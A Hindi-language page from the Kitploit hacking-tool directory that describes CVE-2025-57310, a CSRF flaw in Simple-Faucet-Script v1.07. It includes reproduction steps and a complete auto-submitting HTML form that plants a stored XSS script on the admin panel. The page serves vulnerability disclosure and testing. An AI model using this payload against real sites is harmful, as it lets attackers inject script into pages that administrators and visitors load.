Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-57310 — CVE-2025-57310 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: Simple-Faucet-Script v1.07 में CSRF भेद्यता, जो एडमिन पैनल पर क्राफ्टेड POST अनुरोधों के माध्यम से स्टोर्ड XSS को सक्षम बनाती है। | Kitploit
उपकरण/GitHubGitHub/hossainshadat/cve-2025-57310
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubhossainshadat/cve-2025-57310

CVE-2025-57310

CVE-2025-57310 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: Simple-Faucet-Script v1.07 में CSRF भेद्यता, जो एडमिन पैनल पर क्राफ्टेड POST अनुरोधों के माध्यम से स्टोर्ड XSS को सक्षम बनाती है।

रिपॉजिटरी देखें
19 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-57310

Salmen2/Simple-Faucet-Script v1.07 में एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता, जो admin.php?p=ads&c=1 पर भेजे गए क्राफ्टेड POST अनुरोध के माध्यम से हमलावरों को मनमाना कोड निष्पादित करने की अनुमति देती है।

CWE

CWE-352: क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF)

CVSS v3.1 आधार स्कोर: 8.8 (उच्च)

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

सारांश

यह उत्पाद एडमिन पैनल पर क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) के प्रति संवेदनशील है। जब एक प्रमाणित एडमिन PoC युक्त किसी दुर्भावनापूर्ण पृष्ठ पर जाता है, तो CSRF हमला होमपेज सामग्री में अनधिकृत संशोधन का कारण बनता है।

पुनरुत्पादन के चरण

  1. https://example.com/admin.php पर एक एडमिन के रूप में लॉगिन करें।
  2. निम्नलिखित PoC खोलें, होमपेज पर एक अलर्ट पॉपअप (स्टोर्ड XSS) देखें।
root@kitploit:~
<!DOCTYPE html>
  <html>
  <head>
      <title>CSRF PoC</title>
  </head>
  <body>
      <h3>Standard CSRF PoC</h3>
      <form action="https://example.com/admin.php?p=ads&c=1" method="post">
        <input type="hidden" name="spacetop" value="<script>alert();</script>" />
          <input type="submit" value="Submit request" />
      </form>
      <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
      </script>
  </body>
  </html>

प्रभाव

एक हमलावर spacetop पैरामीटर के माध्यम से होमपेज पर मनमाना HTML/JavaScript इंजेक्ट कर सकता है, जिससे स्टोर्ड क्रॉस-साइट स्क्रिप्टिंग (XSS) उत्पन्न होती है।

टूल डाउनलोड करें